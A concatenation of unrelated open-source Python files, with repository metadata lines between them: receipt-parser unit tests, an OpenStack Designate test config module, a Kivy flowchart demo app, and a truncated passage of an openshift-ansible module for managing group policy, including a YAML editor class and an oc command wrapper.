def test_price_regex_1(self):
for line, price in itertools.izip(self.test_list_1, self.prices):
reg_ex = re.search('\d+\,\d+', line)
# self.assertIsNotNone(reg_ex, "Regex price is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], price, "Price not equal")
def test_qty_regex_1(self):
for line, qty in itertools.izip(self.test_list_1, self.qtys):
reg_ex = re.search('\d+', line)
#self.assertIsNotNone(reg_ex, "Regex quantity is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], qty, "Quantity not equal")
def test_qty_regex_2(self):
reg_ex = re.search('\d+', self.test_line_3)
self.assertIsNone(reg_ex, "Regex quantity is not valid: test 3")
def test_tva_regex_1(self):
for line, tva in itertools.izip(self.test_list_1, self.tvas):
reg_ex = re.search('\d{1,2}%', line)
# self.assertIsNotNone(reg_ex, "Regex tva is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()], tva, "Tva not equal")
def test_name_regex_1(self):
for line, name in itertools.izip(self.test_list_1, self.names):
reg_ex = re.search('[a-zA-Z]{2,}[\S\s]?[a-zA-Z]*[\S\s]?[a-zA-Z]*', line)
# self.assertIsNotNone(reg_ex, "Regex name is not valid: test 1")
self.assertEqual(line[reg_ex.start():reg_ex.end()].strip(' '), name, "Name not equal")
class ParserReadCheckFile(unittest.TestCase):
"""
For this test you should comment 2 lines in CheckParser.py read_file():
self.generate_new_check()
self.check_data = []
"""
def setUp(self):
self.testObj = CheckParser.CheckParser(0, r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\files.txt")
self.testObj2 = CheckParser.CheckParser(0, r"C:\Users\nero_luci\Desktop\GitHub\CheckGuard\tests\files2.txt")
self.expected_check_1 = ["1 x #2 bacsis @ 0,01 0% 0,01 \r\n",
"1 x #1 extra @ 0,10 24% 0,10 \r\n"]
self.expected_check_2 = []
def test_data_1(self):
self.testObj.read_file()
self.assertListEqual(self.testObj.check_data, self.expected_check_1, "Lists are not equal: test 1")
def test_data_2(self):
self.testObj2.read_file()
self.assertListEqual(self.testObj2.check_data, self.expected_check_2, "Lists are not equal: test 2")
testList = [ParserIniPosTest, FileWriteReadTest, RegexTest, ParserReadCheckFile]
testLoad = unittest.TestLoader()
caseList = []
for testCase in testList:
testSuite = testLoad.loadTestsFromTestCase(testCase)
caseList.append(testSuite)
checkGuardTestSuite = unittest.TestSuite(caseList)
runner = unittest.TextTestRunner()
runner.run(checkGuardTestSuite) | gpl-2.0 | 7,732,005,686,704,460,000 | 41.909774 | 116 | 0.560813 | false |
ramsateesh/designate | functionaltests/common/config.py | 1 | 2392 | """
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from oslo_config import cfg
cfg.CONF.register_group(cfg.OptGroup(
name='identity', title="Configuration for Keystone auth"
))
cfg.CONF.register_group(cfg.OptGroup(
name='noauth', title="Configuration to run tests without Keystone"
))
cfg.CONF.register_opts([
cfg.StrOpt('designate_override_url',
help="Use this instead of the endpoint in the service catalog"),
cfg.BoolOpt('append_version_to_url', default=True,
help="Post to url + /v2/zones instead of url + /zones"),
cfg.StrOpt('uri', help="The Keystone v2 endpoint"),
cfg.StrOpt('uri_v3', help="The Keystone v3 endpoint"),
cfg.StrOpt('auth_version', default='v2'),
cfg.StrOpt('region', default=None),
cfg.StrOpt('username'),
cfg.StrOpt('tenant_name'),
cfg.StrOpt('password', secret=True),
cfg.StrOpt('domain_name'),
cfg.StrOpt('alt_username'),
cfg.StrOpt('alt_tenant_name'),
cfg.StrOpt('alt_password', secret=True),
cfg.StrOpt('alt_domain_name'),
cfg.StrOpt('admin_username'),
cfg.StrOpt('admin_tenant_name'),
cfg.StrOpt('admin_password', secret=True),
cfg.StrOpt('admin_domain_name'),
], group='identity')
cfg.CONF.register_opts([
cfg.StrOpt('designate_endpoint', help="The Designate API endpoint"),
cfg.StrOpt('tenant_id', default='noauth-project'),
cfg.StrOpt('alt_tenant_id', default='alt-project'),
cfg.StrOpt('admin_tenant_id', default='admin-project'),
cfg.BoolOpt('use_noauth', default=False),
], group='noauth')
cfg.CONF.register_opts([
cfg.ListOpt('nameservers', default=["127.0.0.1:53"])
], group="designate")
def find_config_file():
return os.environ.get(
'TEMPEST_CONFIG', '/opt/stack/tempest/etc/tempest.conf')
def read_config():
cfg.CONF(args=[], default_config_files=[find_config_file()])
| apache-2.0 | -4,448,889,142,459,497,500 | 30.473684 | 79 | 0.692308 | false |
AO-StreetArt/FinalFlowChartExample | FlowChartExampleApp.py | 1 | 3129 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 20 19:03:15 2015
@author: alex
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import ObjectProperty, ListProperty, NumericProperty, BooleanProperty
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.logger import Logger
from kivy.clock import Clock
from src.DragGrid import DragGrid, DragGridCell
from src.FlowChartNode2 import FlowChartNode, DraggableImage
from src.DraggableOption import DraggableOption
Builder.load_file('flowchartwidget.kv')
class FlowchartExampleWidget(FloatLayout):
drag_grid=ObjectProperty(None)
grid_layout=ObjectProperty(None)
float_layout=ObjectProperty(None)
class FlowchartExampleApp(App):
def build(self):
root = FlowchartExampleWidget()
#Add a flowchart node
lbl = Label(text='Test')
drag_label = DraggableImage(img=lbl, app=self, grid=root.drag_grid, cell=root.drag_grid.cells[0])
drag = FlowChartNode(app=self, grid=root.drag_grid, cell=root.drag_grid.cells[0], label=drag_label)
drag_label.node = drag
root.drag_grid.cells[0].add_widget(drag)
root.drag_grid.cells[0].nodes.append(drag)
root.drag_grid.nodes.append(drag)
#Add a flowchart node
lbl2 = Label(text='Test2')
drag_label2 = DraggableImage(img=lbl2, app=self, grid=root.drag_grid, cell=root.drag_grid.cells[1])
drag2 = FlowChartNode(app=self, grid=root.drag_grid, cell=root.drag_grid.cells[1], label=drag_label2)
drag_label2.node = drag2
root.drag_grid.cells[1].add_widget(drag2)
root.drag_grid.cells[1].nodes.append(drag2)
root.drag_grid.nodes.append(drag2)
#Add a draggable list option that can be dragged into the flowchart.
lbl3 = Label(text='Test')
drag_option = DraggableOption(img=lbl3, app=self, grid=root.drag_grid, grid_layout=root.grid_layout, float_layout=root.float_layout)
root.grid_layout.add_widget(drag_option)
#Add a draggable list option that can be dragged into the flowchart.
lbl4 = Label(text='Test')
drag_option2 = DraggableOption(img=lbl4, app=self, grid=root.drag_grid, grid_layout=root.grid_layout, float_layout=root.float_layout)
root.grid_layout.add_widget(drag_option2)
return root
def add_flowchart_node(self, cell, image):
Logger.debug('Add flowchart node with image %s and cell %s' % (image, cell))
drag_label = DraggableImage(img=image, app=self, grid=self.root.drag_grid, cell=self.root.drag_grid.cells[0])
drag = FlowChartNode(app=self, grid=self.root.drag_grid, cell=self.root.drag_grid.cells[0], label=drag_label)
drag_label.node = drag
cell.add_widget(drag)
cell.nodes.append(drag)
self.root.drag_grid.nodes.append(drag)
if __name__ == '__main__':
FlowchartExampleApp().run() | mit | 2,255,996,567,566,147,300 | 40.733333 | 141 | 0.691595 | false |
joelddiaz/openshift-tools | openshift/installer/vendored/openshift-ansible-3.4.40/roles/lib_openshift/library/oc_adm_policy_group.py | 12 | 68660 | #!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/policy_group -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_adm_policy_group
short_description: Module to manage openshift policy for groups
description:
- Manage openshift policy for groups.
options:
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
namespace:
description:
- The namespace scope
required: false
default: None
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
group:
description:
- The name of the group
required: true
default: None
aliases: []
resource_kind:
description:
- The kind of policy to affect
required: true
default: None
choices: ["role", "cluster-role", "scc"]
aliases: []
resource_name:
description:
- The name of the policy
required: true
default: None
aliases: []
state:
description:
- Desired state of the policy
required: true
default: present
choices: ["present", "absent"]
aliases: []
author:
- "Kenny Woodson <[email protected]>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: oc adm policy remove-scc-from-group an-scc agroup
oc_adm_policy_group:
group: agroup
resource_kind: scc
resource_name: an-scc
state: absent
- name: oc adm policy add-cluster-role-to-group system:build-strategy-docker agroup
oc_adm_policy_group:
group: agroup
resource_kind: cluster-role
resource_name: system:build-strategy-docker
state: present
'''
# -*- -*- -*- End included fragment: doc/policy_group -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# pylint: disable=undefined-variable,missing-docstring
# noqa: E301,E302
class YeditException(Exception):
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods
class Yedit(object):
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z%s/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@separator.setter
def separator(self):
''' getter method for yaml_dict '''
return self._separator
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key % ''.join(common_separators), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key % ''.join(common_separators), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
data.clear()
return True
elif key == '' and isinstance(data, list):
del data[:]
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key, None)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
yfd.write(contents)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, self.filename + '.orig')
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. %s' % err)
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in ' +
'dict with non-dict type. value=[%s] [%s]' % (value, type(value))) # noqa: E501
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if not result:
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.load(invalue)
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[%s] vtype=[%s]'
% (inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# If vtype is not str then go ahead and attempt to yaml load it.
if isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming ' +
'value. value=[%s] vtype=[%s]'
% (type(inc_value), vtype))
return inc_value
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(module):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=module.params['src'],
backup=module.params['backup'],
separator=module.params['separator'])
if module.params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and \
module.params['state'] != 'present':
return {'failed': True,
'msg': 'Error opening file [%s]. Verify that the ' +
'file exists, that it is has correct' +
' permissions, and is valid yaml.'}
if module.params['state'] == 'list':
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
yamlfile.yaml_dict = content
if module.params['key']:
rval = yamlfile.get(module.params['key']) or {}
return {'changed': False, 'result': rval, 'state': "list"}
elif module.params['state'] == 'absent':
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
yamlfile.yaml_dict = content
if module.params['update']:
rval = yamlfile.pop(module.params['key'],
module.params['value'])
else:
rval = yamlfile.delete(module.params['key'])
if rval[0] and module.params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': "absent"}
elif module.params['state'] == 'present':
# check if content is different than what is in the file
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
module.params['value'] is None:
return {'changed': False,
'result': yamlfile.yaml_dict,
'state': "present"}
yamlfile.yaml_dict = content
# we were passed a value; parse it
if module.params['value']:
value = Yedit.parse_value(module.params['value'],
module.params['value_type'])
key = module.params['key']
if module.params['update']:
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(Yedit.parse_value(module.params['curr_value']), # noqa: E501
module.params['curr_value_format']) # noqa: E501
rval = yamlfile.update(key, value, module.params['index'], curr_value) # noqa: E501
elif module.params['append']:
rval = yamlfile.append(key, value)
else:
rval = yamlfile.put(key, value)
if rval[0] and module.params['src']:
yamlfile.write()
return {'changed': rval[0],
'result': rval[1], 'state': "present"}
# no edits to make
if module.params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': "present"}
return {'failed': True, 'msg': 'Unkown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, rname, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource, rname]
if selector:
cmd.append('--selector=%s' % selector)
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["%s=%s" % (key, value) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, rname=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector:
cmd.append('--selector=%s' % selector)
elif rname:
cmd.append(rname)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
# Ensure results are retuned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
''' perform oadm manage-node scheduable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
cmd.append('--schedulable=%s' % schedulable)
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
if grace_period:
cmd.append('--grace-period=%s' % int(grace_period))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']: # E501
cmds.extend(['-n', self.namespace])
